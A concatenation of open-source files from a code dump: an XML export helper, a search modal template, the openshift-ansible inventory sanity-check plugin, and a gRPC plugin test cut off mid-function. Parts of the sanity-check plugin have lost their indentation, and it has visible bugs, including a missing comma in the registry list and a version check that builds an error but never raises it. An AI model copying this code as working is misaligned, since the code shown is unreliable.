            self._set_Dim(item, 'EXWEIGHT', unicode(round(amounts[1], 0)).replace(".", ","))
            self._set_Dim(item, 'EXUNITS', unicode(round(amounts[2], 0)).replace(".", ","))

        if numlgn == 0:
            #no datas
            datas.set('action', 'nihil')
        return decl

    def _set_Dim(self, item, prop, value):
        """Append a <Dim prop="..."> child holding one reported value."""
        dim = ET.SubElement(item, 'Dim')
        dim.set('prop', prop)
        dim.text = value
| agpl-3.0 |
bmillham/djrq2 | web/app/djrq/templates/searchwindow.py | 1 | 1200 | # encoding: cinje
: def searchwindow ctx
: # Bootstrap modal dialog for advanced search.  Submitting the form POSTs
: # to /search via the site's 'ajax' form handler, which appends the
: # results to #main-content; #ricon is a hidden busy indicator.
<div id="searchModal" class="modal fade" role="dialog">
 <div class="modal-dialog">
  <div class="modal-content">
   <div class="modal-header">
        <button type="button" class="close" data-dismiss="modal">&times;</button>
        <h4 class="modal-title"> Advanced Search</h4>
   </div>
   <div class="modal-body">
     <p>You may use SQL % and _ wildcards</p>
     <img id='ricon' style='display:none' src='/public/icons/catgif8.gif'>
     <form id='searchform' action='/search' class='ajax' method='post' data-append='#main-content' role='search'>
      <div class='form-group'>
       <label for='advsearchtype'>Search For</label>
       <select class="form-control" id="advsearchtype" name="advsearchtype">
        <option>Artist</option>
        <option>Album</option>
        <option>Title</option>
       </select>
      </div>
      <input type="search" class="form-control" id="advsearchtext" name="advsearchtext" placeholder="Search">
      <button type="submit" class="btn btn-primary">Search</button>
      <button type="button" class="btn btn-danger" data-dismiss="modal">Close</button>
     </form>
   </div>
  </div>
 </div>
</div>
: end
| mit |
tagliateller/openshift-ansible | roles/lib_utils/action_plugins/sanity_checks.py | 4 | 25951 | """
Ansible action plugin to ensure inventory variables are set
appropriately and no conflicting options have been provided.
"""
import fnmatch
import json
import re
from ansible.plugins.action import ActionBase
from ansible import errors
# pylint: disable=import-error,no-name-in-module
from ansible.module_utils.six.moves.urllib.parse import urlparse
# Valid values for openshift_deployment_type
VALID_DEPLOYMENT_TYPES = ('origin', 'openshift-enterprise')

# Tuple of variable names and default values if undefined.
NET_PLUGIN_LIST = (('openshift_use_openshift_sdn', True),
                   ('openshift_use_flannel', False),
                   ('openshift_use_nuage', False),
                   ('openshift_use_contiv', False),
                   ('openshift_use_calico', False),
                   ('openshift_use_kuryr', False),
                   ('openshift_use_nsx', False))

ENTERPRISE_TAG_REGEX_ERROR = """openshift_image_tag must be in the format
v#.#[.#[.#]]. Examples: v1.2, v3.4.1, v3.5.1.3,
v3.5.1.3.4, v1.2-1, v1.2.3-4, v1.2.3-4.5, v1.2.3-4.5.6
You specified openshift_image_tag={}"""

ORIGIN_TAG_REGEX_ERROR = """openshift_image_tag must be in the format
v#.#[.#-optional.#]. Examples: v1.2.3, v3.5.1-alpha.1
You specified openshift_image_tag={}"""

# Each *_REGEX dict pairs the validating pattern ('re') with the message
# template raised on mismatch ('error_msg').
ORIGIN_TAG_REGEX = {'re': '(^v?\\d+\\.\\d+.*)',
                    'error_msg': ORIGIN_TAG_REGEX_ERROR}
ENTERPRISE_TAG_REGEX = {'re': '(^v\\d+\\.\\d+(\\.\\d+)*(-\\d+(\\.\\d+)*)?$)',
                        'error_msg': ENTERPRISE_TAG_REGEX_ERROR}
# Keyed by openshift_deployment_type.
IMAGE_TAG_REGEX = {'origin': ORIGIN_TAG_REGEX,
                   'openshift-enterprise': ENTERPRISE_TAG_REGEX}

PKG_VERSION_REGEX_ERROR = """openshift_pkg_version must be in the format
-[optional.release]. Examples: -3.6.0, -3.7.0-0.126.0.git.0.9351aae.el7 -3.11*
You specified openshift_pkg_version={}"""
PKG_VERSION_REGEX = {'re': '(^-.*)',
                     'error_msg': PKG_VERSION_REGEX_ERROR}

RELEASE_REGEX_ERROR = """openshift_release must be in the format
v#[.#[.#]]. Examples: v3.9, v3.10.0
You specified openshift_release={}"""
RELEASE_REGEX = {'re': '(^v?\\d+(\\.\\d+(\\.\\d+)?)?$)',
                 'error_msg': RELEASE_REGEX_ERROR}

# Storage-kind variables that may not be 'nfs' unless unsupported
# configurations are explicitly enabled.
STORAGE_KIND_TUPLE = (
    'openshift_loggingops_storage_kind',
    'openshift_logging_storage_kind',
    'openshift_metrics_storage_kind')

IMAGE_POLICY_CONFIG_VAR = "openshift_master_image_policy_config"
ALLOWED_REGISTRIES_VAR = "openshift_master_image_policy_allowed_registries_for_import"

# Pairs of (removed variable name, replacement hint) used by
# check_for_removed_vars to fail fast on stale inventories.
REMOVED_VARIABLES = (
    ('openshift_hostname', 'Removed: See documentation'),
    # TODO(michaelgugino): Remove in 3.12
    ('oreg_auth_credentials_replace', 'Removed: Credentials are now always updated'),
    ('oreg_url_master', 'oreg_url'),
    ('oreg_url_node', 'oreg_url'),
    ('openshift_cockpit_deployer_prefix', 'openshift_cockpit_deployer_image'),
    ('openshift_cockpit_deployer_basename', 'openshift_cockpit_deployer_image'),
    ('openshift_cockpit_deployer_version', 'openshift_cockpit_deployer_image'),
    ('openshift_hosted_logging_elasticsearch_pvc_prefix', 'openshift_logging_es_pvc_prefix'),
    ('logging_ops_hostname', 'openshift_logging_kibana_ops_hostname'),
    ('openshift_hosted_logging_ops_hostname', 'openshift_logging_kibana_ops_hostname'),
    ('openshift_hosted_logging_elasticsearch_cluster_size', 'logging_elasticsearch_cluster_size'),
    ('openshift_hosted_logging_elasticsearch_ops_cluster_size', 'logging_elasticsearch_ops_cluster_size'),
    ('openshift_hosted_logging_storage_kind', 'openshift_logging_storage_kind'),
    ('openshift_hosted_logging_storage_host', 'openshift_logging_storage_host'),
    ('openshift_hosted_logging_storage_labels', 'openshift_logging_storage_labels'),
    ('openshift_hosted_logging_storage_volume_size', 'openshift_logging_storage_volume_size'),
    ('openshift_hosted_loggingops_storage_kind', 'openshift_loggingops_storage_kind'),
    ('openshift_hosted_loggingops_storage_host', 'openshift_loggingops_storage_host'),
    ('openshift_hosted_loggingops_storage_labels', 'openshift_loggingops_storage_labels'),
    ('openshift_hosted_loggingops_storage_volume_size', 'openshift_loggingops_storage_volume_size'),
    ('openshift_hosted_logging_enable_ops_cluster', 'openshift_logging_use_ops'),
    ('openshift_hosted_logging_image_pull_secret', 'openshift_logging_image_pull_secret'),
    ('openshift_hosted_logging_hostname', 'openshift_logging_kibana_hostname'),
    ('openshift_hosted_logging_kibana_nodeselector', 'openshift_logging_kibana_nodeselector'),
    ('openshift_hosted_logging_kibana_ops_nodeselector', 'openshift_logging_kibana_ops_nodeselector'),
    ('openshift_hosted_logging_journal_source', 'openshift_logging_fluentd_journal_source'),
    ('openshift_hosted_logging_journal_read_from_head', 'openshift_logging_fluentd_journal_read_from_head'),
    ('openshift_hosted_logging_fluentd_nodeselector_label', 'openshift_logging_fluentd_nodeselector'),
    ('openshift_hosted_logging_elasticsearch_instance_ram', 'openshift_logging_es_memory_limit'),
    ('openshift_hosted_logging_elasticsearch_nodeselector', 'openshift_logging_es_nodeselector'),
    ('openshift_hosted_logging_elasticsearch_ops_nodeselector', 'openshift_logging_es_ops_nodeselector'),
    ('openshift_hosted_logging_elasticsearch_ops_instance_ram', 'openshift_logging_es_ops_memory_limit'),
    ('openshift_hosted_logging_storage_access_modes', 'openshift_logging_storage_access_modes'),
    ('openshift_hosted_logging_master_public_url', 'openshift_logging_master_public_url'),
    ('openshift_hosted_logging_deployer_prefix', 'openshift_logging_image_prefix'),
    ('openshift_hosted_logging_deployer_version', 'openshift_logging_image_version'),
    ('openshift_hosted_logging_deploy', 'openshift_logging_install_logging'),
    ('openshift_hosted_logging_curator_nodeselector', 'openshift_logging_curator_nodeselector'),
    ('openshift_hosted_logging_curator_ops_nodeselector', 'openshift_logging_curator_ops_nodeselector'),
    ('openshift_hosted_metrics_storage_access_modes', 'openshift_metrics_storage_access_modes'),
    ('openshift_hosted_metrics_storage_host', 'openshift_metrics_storage_host'),
    ('openshift_hosted_metrics_storage_nfs_directory', 'openshift_metrics_storage_nfs_directory'),
    ('openshift_hosted_metrics_storage_volume_name', 'openshift_metrics_storage_volume_name'),
    ('openshift_hosted_metrics_storage_volume_size', 'openshift_metrics_storage_volume_size'),
    ('openshift_hosted_metrics_storage_labels', 'openshift_metrics_storage_labels'),
    ('openshift_hosted_metrics_deployer_prefix', 'openshift_metrics_image_prefix'),
    ('openshift_hosted_metrics_deployer_version', 'openshift_metrics_image_version'),
    ('openshift_hosted_metrics_deploy', 'openshift_metrics_install_metrics'),
    ('openshift_hosted_metrics_storage_kind', 'openshift_metrics_storage_kind'),
    ('openshift_hosted_metrics_public_url', 'openshift_metrics_hawkular_hostname'),
    ('openshift_node_labels', 'openshift_node_groups[<item>].labels'),
    ('openshift_node_kubelet_args', 'openshift_node_groups[<item>].edits'),
)

# JSON_FORMAT_VARIABLES does not intende to cover all json variables, but
# complicated json variables in hosts.example are covered.
JSON_FORMAT_VARIABLES = (
    'openshift_builddefaults_json',
    'openshift_buildoverrides_json',
    'openshift_master_admission_plugin_config',
    'openshift_master_audit_config',
    'openshift_crio_docker_gc_node_selector',
    'openshift_master_image_policy_allowed_registries_for_import',
    'openshift_master_image_policy_config',
    'openshift_master_oauth_templates',
    'container_runtime_extra_storage',
    'openshift_additional_repos',
    'openshift_master_identity_providers',
    'openshift_master_htpasswd_users',
    'openshift_additional_projects',
    'openshift_hosted_routers',
    'openshift_node_open_ports',
    'openshift_master_open_ports',
)
def to_bool(var_to_check):
    """Normalize the many spellings of boolean truth used in inventories.

    See http://yaml.org/type/bool.html for the YAML spellings.  Membership
    is tested by equality against a tuple, so True and 1 also match while
    anything unrecognized (including unhashable values) is simply falsy.
    """
    truthy_spellings = (True, 1, "True", "1", "true", "TRUE",
                        "Yes", "yes", "Y", "y", "YES",
                        "on", "ON", "On")
    return var_to_check in truthy_spellings
def check_for_removed_vars(hostvars, host):
    """Fail the run if any removed/renamed inventory variable is still set.

    :param hostvars: mapping of host name -> dict of that host's variables.
    :param host: host whose variables are inspected.
    :raises errors.AnsibleModuleError: listing every removed variable found,
        together with its replacement hint.
    :returns: None when no removed variable is present.
    """
    found_removed = []
    for item in REMOVED_VARIABLES:
        # item is an (old_name, replacement) pair; only the old variable
        # *name* must be looked up in the host's vars.  The previous code
        # tested the whole tuple ("item in hostvars[host]"), which can
        # never match a string key, so the check silently never fired.
        if item[0] in hostvars[host]:
            found_removed.append(item)

    if found_removed:
        msg = "Found removed variables: "
        for item in found_removed:
            msg += "{} is replaced by {}; ".format(item[0], item[1])
        raise errors.AnsibleModuleError(msg)
    return None
class ActionModule(ActionBase):
"""Action plugin to execute sanity checks."""
def template_var(self, hostvars, host, varname):
"""Retrieve a variable from hostvars and template it.
If undefined, return None type."""
# We will set the current host and variable checked for easy debugging
# if there are any unhandled exceptions.
# pylint: disable=W0201
self.last_checked_var = varname
# pylint: disable=W0201
self.last_checked_host = host
res = hostvars[host].get(varname)
if res is None:
return None
return self._templar.template(res)
def check_openshift_deployment_type(self, hostvars, host):
"""Ensure a valid openshift_deployment_type is set"""
openshift_deployment_type = self.template_var(hostvars, host,
'openshift_deployment_type')
if openshift_deployment_type not in VALID_DEPLOYMENT_TYPES:
type_strings = ", ".join(VALID_DEPLOYMENT_TYPES)
msg = "openshift_deployment_type must be defined and one of {}".format(type_strings)
raise errors.AnsibleModuleError(msg)
return openshift_deployment_type
    def get_allowed_registries(self, hostvars, host):
        """Returns a list of configured allowedRegistriesForImport as a list of patterns.

        Two inventory spellings are accepted:
        - ALLOWED_REGISTRIES_VAR: a plain list of patterns, or
        - IMAGE_POLICY_CONFIG_VAR: a dict (or JSON string) whose
          'allowedRegistriesForImport' entries each carry a 'domainName'.
        Returns None/empty when neither is configured; raises
        AnsibleModuleError on any malformed structure.
        """
        allowed_registries_for_import = self.template_var(hostvars, host, ALLOWED_REGISTRIES_VAR)
        if allowed_registries_for_import is None:
            # Fall back to extracting the list from the full image policy
            # config document.
            image_policy_config = self.template_var(hostvars, host, IMAGE_POLICY_CONFIG_VAR)
            if not image_policy_config:
                return image_policy_config

            if isinstance(image_policy_config, str):
                try:
                    image_policy_config = json.loads(image_policy_config)
                except Exception:
                    raise errors.AnsibleModuleError(
                        "{} is not a valid json string".format(IMAGE_POLICY_CONFIG_VAR))

            if not isinstance(image_policy_config, dict):
                raise errors.AnsibleModuleError(
                    "expected dictionary for {}, not {}".format(
                        IMAGE_POLICY_CONFIG_VAR, type(image_policy_config)))

            detailed = image_policy_config.get("allowedRegistriesForImport", None)
            if not detailed:
                return detailed

            if not isinstance(detailed, list):
                raise errors.AnsibleModuleError("expected list for {}['{}'], not {}".format(
                    IMAGE_POLICY_CONFIG_VAR, "allowedRegistriesForImport",
                    type(allowed_registries_for_import)))

            try:
                # Reduce the detailed entries to their bare domain patterns.
                return [i["domainName"] for i in detailed]
            except Exception:
                raise errors.AnsibleModuleError(
                    "each item of allowedRegistriesForImport must be a dictionary with 'domainName' key")

        if not isinstance(allowed_registries_for_import, list):
            raise errors.AnsibleModuleError("expected list for {}, not {}".format(
                IMAGE_POLICY_CONFIG_VAR, type(allowed_registries_for_import)))

        return allowed_registries_for_import
def check_whitelisted_registries(self, hostvars, host):
"""Ensure defined registries are whitelisted"""
allowed = self.get_allowed_registries(hostvars, host)
if allowed is None:
return
unmatched_registries = []
for regvar in (
"oreg_url"
"openshift_cockpit_deployer_prefix",
"openshift_metrics_image_prefix",
"openshift_logging_image_prefix",
"openshift_service_catalog_image_prefix",
"openshift_docker_insecure_registries"):
value = self.template_var(hostvars, host, regvar)
if not value:
continue
if isinstance(value, list):
registries = value
else:
registries = [value]
for reg in registries:
if not any(is_registry_match(reg, pat) for pat in allowed):
unmatched_registries.append((regvar, reg))
if unmatched_registries:
registry_list = ", ".join(["{}:{}".format(n, v) for n, v in unmatched_registries])
raise errors.AnsibleModuleError(
"registry hostnames of the following image prefixes are not whitelisted by image"
" policy configuration: {}".format(registry_list))
def check_python_version(self, hostvars, host, distro):
"""Ensure python version is 3 for Fedora and python 2 for others"""
ansible_python = self.template_var(hostvars, host, 'ansible_python')
if distro == "Fedora":
if ansible_python['version']['major'] != 3:
msg = "openshift-ansible requires Python 3 for {};".format(distro)
msg += " For information on enabling Python 3 with Ansible,"
msg += " see https://docs.ansible.com/ansible/python_3_support.html"
raise errors.AnsibleModuleError(msg)
else:
if ansible_python['version']['major'] != 2:
msg = "openshift-ansible requires Python 2 for {};".format(distro)
def check_image_tag_format(self, hostvars, host, openshift_deployment_type):
"""Ensure openshift_image_tag is formatted correctly"""
openshift_image_tag = self.template_var(hostvars, host, 'openshift_image_tag')
if not openshift_image_tag or openshift_image_tag == 'latest':
return None
regex_to_match = IMAGE_TAG_REGEX[openshift_deployment_type]['re']
res = re.match(regex_to_match, str(openshift_image_tag))
if res is None:
msg = IMAGE_TAG_REGEX[openshift_deployment_type]['error_msg']
msg = msg.format(str(openshift_image_tag))
raise errors.AnsibleModuleError(msg)
def check_pkg_version_format(self, hostvars, host):
"""Ensure openshift_pkg_version is formatted correctly"""
openshift_pkg_version = self.template_var(hostvars, host, 'openshift_pkg_version')
if not openshift_pkg_version:
return None
regex_to_match = PKG_VERSION_REGEX['re']
res = re.match(regex_to_match, str(openshift_pkg_version))
if res is None:
msg = PKG_VERSION_REGEX['error_msg']
msg = msg.format(str(openshift_pkg_version))
raise errors.AnsibleModuleError(msg)
def check_release_format(self, hostvars, host):
"""Ensure openshift_release is formatted correctly"""
openshift_release = self.template_var(hostvars, host, 'openshift_release')
if not openshift_release:
return None
regex_to_match = RELEASE_REGEX['re']
res = re.match(regex_to_match, str(openshift_release))
if res is None:
msg = RELEASE_REGEX['error_msg']
msg = msg.format(str(openshift_release))
raise errors.AnsibleModuleError(msg)
    def network_plugin_check(self, hostvars, host):
        """Ensure only one type of network plugin is enabled.

        Raises AnsibleModuleError when more than one of the
        NET_PLUGIN_LIST booleans evaluates true for the host (zero or one
        enabled is accepted).
        """
        res = []
        # Loop through each possible network plugin boolean, determine the
        # actual boolean value, and append results into a list.
        for plugin, default_val in NET_PLUGIN_LIST:
            res_temp = self.template_var(hostvars, host, plugin)
            if res_temp is None:
                res_temp = default_val
            res.append(to_bool(res_temp))

        # Booleans sum as 0/1, so the total is the count of enabled plugins.
        if sum(res) not in (0, 1):
            plugin_str = list(zip([x[0] for x in NET_PLUGIN_LIST], res))

            msg = "Host Checked: {} Only one of must be true. Found: {}".format(host, plugin_str)
            raise errors.AnsibleModuleError(msg)
def check_hostname_vars(self, hostvars, host):
    """Ensure openshift_kubelet_name_override and openshift_public_hostname
    conform to the proper length of 63 characters or less."""
    hostname_vars = ('openshift_public_hostname',
                     'openshift_kubelet_name_override')
    for varname in hostname_vars:
        value = self.template_var(hostvars, host, varname)
        # DNS labels are capped at 63 characters; unset/empty values pass.
        if value and len(value) > 63:
            raise errors.AnsibleModuleError(
                '{} must be 63 characters or less'.format(varname))
def check_session_auth_secrets(self, hostvars, host):
    """Validate the master session auth/encryption secret lists.

    Both variables are optional; validation only runs when at least one is
    set. The two lists must both be lists of equal length, auth secrets
    must be >= 32 characters, and encryption secrets must be exactly 16,
    24, or 32 characters (AES key sizes).
    """
    auth_secrets = self.template_var(
        hostvars, host, 'openshift_master_session_auth_secrets')
    enc_secrets = self.template_var(
        hostvars, host, 'openshift_master_session_encryption_secrets')
    # This variable isn't mandatory, only check if set.
    if auth_secrets is None and enc_secrets is None:
        return None
    both_lists = isinstance(auth_secrets, list) and isinstance(enc_secrets, list)
    if not both_lists or len(auth_secrets) != len(enc_secrets):
        raise errors.AnsibleModuleError(
            'Expects openshift_master_session_auth_secrets and '
            'openshift_master_session_encryption_secrets are equal length lists')
    for secret in auth_secrets:
        if len(secret) < 32:
            raise errors.AnsibleModuleError(
                'Invalid secret in openshift_master_session_auth_secrets. '
                'Secrets must be at least 32 characters in length.')
    for secret in enc_secrets:
        if len(secret) not in (16, 24, 32):
            raise errors.AnsibleModuleError(
                'Invalid secret in openshift_master_session_encryption_secrets. '
                'Secrets must be 16, 24, or 32 characters in length.')
    return None
def check_unsupported_nfs_configs(self, hostvars, host):
    """Fail when any storage component is backed by NFS.

    The check is skipped entirely when
    openshift_enable_unsupported_configurations is truthy.
    """
    enable_unsupported = self.template_var(
        hostvars, host, 'openshift_enable_unsupported_configurations')
    if to_bool(enable_unsupported):
        return None
    for storage in STORAGE_KIND_TUPLE:
        if self.template_var(hostvars, host, storage) == 'nfs':
            raise errors.AnsibleModuleError(
                'nfs is an unsupported type for {}. '
                'openshift_enable_unsupported_configurations=True must '
                'be specified to continue with this configuration.'
                ''.format(storage))
    return None
def check_htpasswd_provider(self, hostvars, host):
    """Fails if openshift_master_identity_providers contains an entry of
    kind HTPasswdPasswordIdentityProvider that still references an htpasswd
    file via a legacy key while openshift_master_manage_htpasswd is False.
    """
    manage_pass = self.template_var(
        hostvars, host, 'openshift_master_manage_htpasswd')
    if to_bool(manage_pass):
        # If we manage the file, we can just generate in the new path.
        return None
    idps = self.template_var(
        hostvars, host, 'openshift_master_identity_providers')
    if not idps:
        # If we don't find any identity_providers, nothing for us to do.
        return None
    old_keys = ('file', 'fileName', 'file_name', 'filename')
    if not isinstance(idps, list):
        raise errors.AnsibleModuleError("| not a list")
    for idp in idps:
        if idp['kind'] == 'HTPasswdPasswordIdentityProvider':
            for old_key in old_keys:
                # Was `old_key in idp is not None`, an accidental chained
                # comparison; the plain membership test is the intent.
                if old_key in idp:
                    # Also restores the missing space between "key" and
                    # "before" in the original adjacent string literals.
                    raise errors.AnsibleModuleError(
                        'openshift_master_identity_providers contains a '
                        'provider of kind==HTPasswdPasswordIdentityProvider '
                        'and {} is set. Please migrate your htpasswd '
                        'files to /etc/origin/master/htpasswd and update your '
                        'existing master configs, and remove the {} key '
                        'before proceeding.'.format(old_key, old_key))
def validate_json_format_vars(self, hostvars, host):
    """Fail when any JSON_FORMAT_VARIABLES value is not valid JSON.

    All offending variables are collected first so the raised
    errors.AnsibleModuleError reports every invalid value at once.
    """
    found_invalid_json = []
    for var in JSON_FORMAT_VARIABLES:
        if var in hostvars[host]:
            json_var = self.template_var(hostvars, host, var)
            try:
                json.loads(json_var)
            except ValueError as json_err:
                found_invalid_json.append([var, json_var, json_err])
            except Exception:
                # Non-string values (TypeError etc.) are deliberately
                # ignored. This was `except BaseException`, which also
                # swallowed KeyboardInterrupt/SystemExit; Exception is the
                # widest net we should cast here.
                pass
    if found_invalid_json:
        msg = "Found invalid json format variables:\n"
        for item in found_invalid_json:
            msg += " {} specified in {} is invalid json format\n {}".format(item[1], item[0], item[2])
        raise errors.AnsibleModuleError(msg)
    return None
def check_for_oreg_password(self, hostvars, host, odt):
    """Ensure oreg_auth_password is defined when the registry requires it.

    Authentication is required either when oreg_url points at
    registry.redhat.io, or when no oreg_url is set and the deployment type
    ``odt`` is openshift-enterprise (implying the default enterprise
    registry).
    """
    reg_to_check = 'registry.redhat.io'
    err_msg = ("oreg_auth_user and oreg_auth_password must be provided when "
               "deploying openshift-enterprise")
    err_msg2 = ("oreg_auth_user and oreg_auth_password must be provided when using "
                "{}".format(reg_to_check))
    if self.template_var(hostvars, host, 'oreg_auth_password') is not None:
        # A password is defined, so we're good to go.
        return None
    oreg_url = self.template_var(hostvars, host, 'oreg_url')
    if oreg_url is not None:
        if reg_to_check in oreg_url:
            raise errors.AnsibleModuleError(err_msg2)
    elif odt == 'openshift-enterprise':
        # We're not using an oreg_url, we're using default enterprise
        # registry. We require oreg_auth_user and oreg_auth_password.
        raise errors.AnsibleModuleError(err_msg)
def run_checks(self, hostvars, host):
    """Execute the hostvars validations against host"""
    # The deployment type is resolved first because several later checks
    # (image tag format, oreg password) are deployment-type specific.
    distro = self.template_var(hostvars, host, 'ansible_distribution')
    odt = self.check_openshift_deployment_type(hostvars, host)
    self.check_whitelisted_registries(hostvars, host)
    self.check_python_version(hostvars, host, distro)
    self.check_image_tag_format(hostvars, host, odt)
    self.check_pkg_version_format(hostvars, host)
    self.check_release_format(hostvars, host)
    self.network_plugin_check(hostvars, host)
    self.check_hostname_vars(hostvars, host)
    self.check_session_auth_secrets(hostvars, host)
    self.check_unsupported_nfs_configs(hostvars, host)
    self.check_htpasswd_provider(hostvars, host)
    # check_for_removed_vars is a module-level helper, not a method.
    check_for_removed_vars(hostvars, host)
    self.validate_json_format_vars(hostvars, host)
    self.check_for_oreg_password(hostvars, host, odt)
def run(self, tmp=None, task_vars=None):
    """Action-plugin entry point: run the sanity checks on every host in
    the ``check_hosts`` task parameter.

    Returns the standard Ansible action result dict on success; raises
    errors.AnsibleModuleError as soon as any check fails.
    """
    result = super(ActionModule, self).run(tmp, task_vars)
    # self.task_vars holds all in-scope variables.
    # Ignore setting self.task_vars outside of init.
    # pylint: disable=W0201
    self.task_vars = task_vars or {}
    # Track the last host/variable examined so unexpected exceptions can be
    # reported with useful context.
    # pylint: disable=W0201
    self.last_checked_host = "none"
    # pylint: disable=W0201
    self.last_checked_var = "none"
    # self._task.args holds task parameters.
    # check_hosts is a parameter to this plugin, and should provide
    # a list of hosts.
    check_hosts = self._task.args.get('check_hosts')
    if not check_hosts:
        raise errors.AnsibleModuleError("check_hosts is required")
    # We need to access each host's variables.
    hostvars = self.task_vars.get('hostvars')
    if not hostvars:
        # The original raised with the (empty) hostvars value itself as the
        # message, which produced a useless/blank error.
        raise errors.AnsibleModuleError("hostvars not found in task_vars")
    # We loop through each host in the provided list check_hosts.
    for host in check_hosts:
        try:
            self.run_checks(hostvars, host)
        except Exception as uncaught_e:
            msg = "last_checked_host: {}, last_checked_var: {};"
            msg = msg.format(self.last_checked_host, self.last_checked_var)
            msg += str(uncaught_e)
            raise errors.AnsibleModuleError(msg)
    result["changed"] = False
    result["failed"] = False
    result["msg"] = "Sanity Checks passed"
    return result
def is_registry_match(item, pattern):
    """Return True when registry ``item`` matches whitelist ``pattern``.

    Unlike in OpenShift, the comparison is done solely on the hostname part
    (excluding the port part) since the latter is much more difficult due to
    vague definition of port defaulting based on insecure flag. Moreover, most
    of the registries will be listed without the port and insecure flag.
    """
    # Prepend a dummy scheme so urlparse() always yields a hostname,
    # whether or not the item already carried one.
    normalized = "schema://" + item.split('://', 1)[-1]
    host_pattern = pattern.rsplit(':', 1)[0]  # strip a trailing :port
    hostname = urlparse(normalized).hostname
    return fnmatch.fnmatch(hostname, host_pattern)
| apache-2.0 |
kpayson64/grpc | src/python/grpcio_tests/tests/protoc_plugin/_python_plugin_test.py | 13 | 20483 | # Copyright 2015 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
import contextlib
import distutils.spawn
import errno
import os
import shutil
import subprocess
import sys
import tempfile
import threading
import unittest
from six import moves
import grpc
from tests.unit import test_common
from tests.unit.framework.common import test_constants
import tests.protoc_plugin.protos.payload.test_payload_pb2 as payload_pb2
import tests.protoc_plugin.protos.requests.r.test_requests_pb2 as request_pb2
import tests.protoc_plugin.protos.responses.test_responses_pb2 as response_pb2
import tests.protoc_plugin.protos.service.test_service_pb2_grpc as service_pb2_grpc
# Identifiers of entities we expect to find in the generated module.
STUB_IDENTIFIER = 'TestServiceStub'
SERVICER_IDENTIFIER = 'TestServiceServicer'
ADD_SERVICER_TO_SERVER_IDENTIFIER = 'add_TestServiceServicer_to_server'
class _ServicerMethods(object):
    """Backing implementations for the TestService RPCs.

    Exposes ``pause``/``fail`` context managers so tests can make the
    servicer block, or raise, while an RPC is in flight.
    """

    def __init__(self):
        # _condition guards _paused/_fail and lets _control() wait for resume.
        self._condition = threading.Condition()
        self._paused = False
        self._fail = False

    @contextlib.contextmanager
    def pause(self):  # pylint: disable=invalid-name
        """While active, every RPC handler blocks inside _control()."""
        with self._condition:
            self._paused = True
        yield
        with self._condition:
            self._paused = False
            self._condition.notify_all()

    @contextlib.contextmanager
    def fail(self):  # pylint: disable=invalid-name
        """While active, every RPC handler raises from _control()."""
        with self._condition:
            self._fail = True
        yield
        with self._condition:
            self._fail = False

    def _control(self):  # pylint: disable=invalid-name
        # Called by every handler: raise if fail() is active, block while
        # pause() is active.
        with self._condition:
            if self._fail:
                raise ValueError()
            while self._paused:
                self._condition.wait()

    def UnaryCall(self, request, unused_rpc_context):
        # Respond with 'a' * response_size as the compressable payload.
        response = response_pb2.SimpleResponse()
        response.payload.payload_type = payload_pb2.COMPRESSABLE
        response.payload.payload_compressable = 'a' * request.response_size
        self._control()
        return response

    def StreamingOutputCall(self, request, unused_rpc_context):
        # One response per requested response_parameters entry.
        for parameter in request.response_parameters:
            response = response_pb2.StreamingOutputCallResponse()
            response.payload.payload_type = payload_pb2.COMPRESSABLE
            response.payload.payload_compressable = 'a' * parameter.size
            self._control()
            yield response

    def StreamingInputCall(self, request_iter, unused_rpc_context):
        # Sum the payload sizes of every request in the stream.
        response = response_pb2.StreamingInputCallResponse()
        aggregated_payload_size = 0
        for request in request_iter:
            aggregated_payload_size += len(request.payload.payload_compressable)
        response.aggregated_payload_size = aggregated_payload_size
        self._control()
        return response

    def FullDuplexCall(self, request_iter, unused_rpc_context):
        # Stream responses as requests arrive.
        for request in request_iter:
            for parameter in request.response_parameters:
                response = response_pb2.StreamingOutputCallResponse()
                response.payload.payload_type = payload_pb2.COMPRESSABLE
                response.payload.payload_compressable = 'a' * parameter.size
                self._control()
                yield response

    def HalfDuplexCall(self, request_iter, unused_rpc_context):
        # Consume the whole request stream first, then stream the responses.
        responses = []
        for request in request_iter:
            for parameter in request.response_parameters:
                response = response_pb2.StreamingOutputCallResponse()
                response.payload.payload_type = payload_pb2.COMPRESSABLE
                response.payload.payload_compressable = 'a' * parameter.size
                self._control()
                responses.append(response)
        for response in responses:
            yield response
class _Service(
        collections.namedtuple('_Service', (
            'servicer_methods',
            'server',
            'stub',
        ))):
    """A live and running service.

    Attributes:
      servicer_methods: The _ServicerMethods servicing RPCs (None for the
        deliberately incomplete service).
      server: The grpc.Server servicing RPCs.
      stub: A stub on which to invoke RPCs.
    """
def _CreateService():
    """Provides a servicer backend and a stub.

    Returns:
      A _Service with which to test RPCs.
    """
    servicer_methods = _ServicerMethods()

    # Thin delegating servicer: each handler forwards to the controllable
    # _ServicerMethods instance captured by closure.
    class Servicer(getattr(service_pb2_grpc, SERVICER_IDENTIFIER)):

        def UnaryCall(self, request, context):
            return servicer_methods.UnaryCall(request, context)

        def StreamingOutputCall(self, request, context):
            return servicer_methods.StreamingOutputCall(request, context)

        def StreamingInputCall(self, request_iter, context):
            return servicer_methods.StreamingInputCall(request_iter, context)

        def FullDuplexCall(self, request_iter, context):
            return servicer_methods.FullDuplexCall(request_iter, context)

        def HalfDuplexCall(self, request_iter, context):
            return servicer_methods.HalfDuplexCall(request_iter, context)

    server = test_common.test_server()
    add_servicer = getattr(service_pb2_grpc, ADD_SERVICER_TO_SERVER_IDENTIFIER)
    add_servicer(Servicer(), server)
    port = server.add_insecure_port('[::]:0')
    server.start()
    channel = grpc.insecure_channel('localhost:{}'.format(port))
    stub = getattr(service_pb2_grpc, STUB_IDENTIFIER)(channel)
    return _Service(servicer_methods, server, stub)
def _CreateIncompleteService():
    """Provides a servicer backend that fails to implement methods and its stub.

    Returns:
      A _Service with which to test RPCs. The returned _Service's
      servicer_methods implements none of the methods required of it.
    """
    # Deliberately implement nothing: every RPC should fail UNIMPLEMENTED.
    class Servicer(getattr(service_pb2_grpc, SERVICER_IDENTIFIER)):
        pass

    server = test_common.test_server()
    add_servicer = getattr(service_pb2_grpc, ADD_SERVICER_TO_SERVER_IDENTIFIER)
